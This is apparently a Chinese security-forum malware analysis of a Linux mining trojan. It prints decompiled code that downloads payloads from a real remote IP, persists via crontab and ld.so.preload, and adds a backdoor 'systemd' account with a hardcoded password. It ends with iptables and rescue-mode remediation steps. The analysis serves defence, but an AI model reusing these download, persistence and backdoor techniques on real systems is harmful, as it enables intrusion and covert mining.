crontab -l
@reboot /var/log/log > /dev/null 2>&1 & disown
ld.so.preload
while ( 1 )
{
check_and_start_ssh();
check_and_run_crontab();
check_and_move_files();
ensure_user_exists("systemd");
......
}
if ( (unsigned int)password_needs_update("systemd", "Voidsetdownload.so") )
{
printf("zhengzai gengxin mima %s...\n", "systemd");
set_password("systemd", "Voidsetdownload.so");
}
if ( file_exists("/usr/local/lib/sshdD.so") && file_exists("/usr/bin/log") && file_exists("/var/log/log") )
{
if ( (int)set_immutable("/usr/local/lib/sshdD.so") < 0 )
fprintf(stderr, "cuou: wufadan bahu wejian %s\n", "/usr/local/lib/sshdD.so");
...
}
update_ld_preload();
if ( file_exists("/var/log/log") && !script_ran_4799 )
{
run_script();
script_ran_4799 = 1;
}
if ( !file_exists("/usr/local/lib/sshdD.so") || !file_exists("/usr/bin/log") || !file_exists("/var/log/log") )
{
puts("zhegzai chonxin xizai wejian...");
ensure_files();
}
void ensure_files()
{
if ( !file_exists("/usr/local/lib/sshdD.so") )
{
puts("zhengzai xiazai sshdd.so...");
download_file("http://147.45.42.44/downloads/sshdD.so", "/usr/local/lib/sshdD.so");
set_executable_permissions("/usr/local/lib/sshdD.so", 0x1EDu);
}
if ( !file_exists("/usr/bin/log") )
{
puts("zhengzai xiazai log...");
download_file("http://147.45.42.44/downloads/g7c/log", "/usr/bin/log");
set_executable_permissions("/usr/bin/log", 0x1EDu);
}
if ( !file_exists("/var/log/log") )
{
puts("zhengzai xiazai script...");
download_file("http://147.45.42.44/downloads/log", "/var/log/log");
set_executable_permissions("/var/log/log", 0x1EDu);
}
}
system("crontab -r");
v3 = fopen("/tmp/crontab_edit.txt", "w");
if ( v3 )
{
fprintf(v3, "@reboot %s > /dev/null 2>&1 & disown\n", "/var/log/log");
fclose(v3);
system("crontab /tmp/crontab_edit.txt");
}
else
{
perror("cuou: binji crntab shbai");
}
远程通过http://147.45.42.44/downloads/ 下载木马程序
挖矿木马程序:/var/log/log
持续监听木马程序:/usr/bin/log
木马动态库:/usr/local/lib/sshdD.so
再通过修改/etc/ld.so.preload 配置文件内容,用以加载恶意的动态链接库
sudo iptables -A OUTPUT -d 147.45.42.44 -j DROP
sudo iptables -L OUTPUT -v -n
sudo systemctl rescue
看雪ID:aimhack
https://bbs.kanxue.com/user-home-676504.htm
# 往期推荐
球分享
球点赞
球在看
点击阅读原文查看更多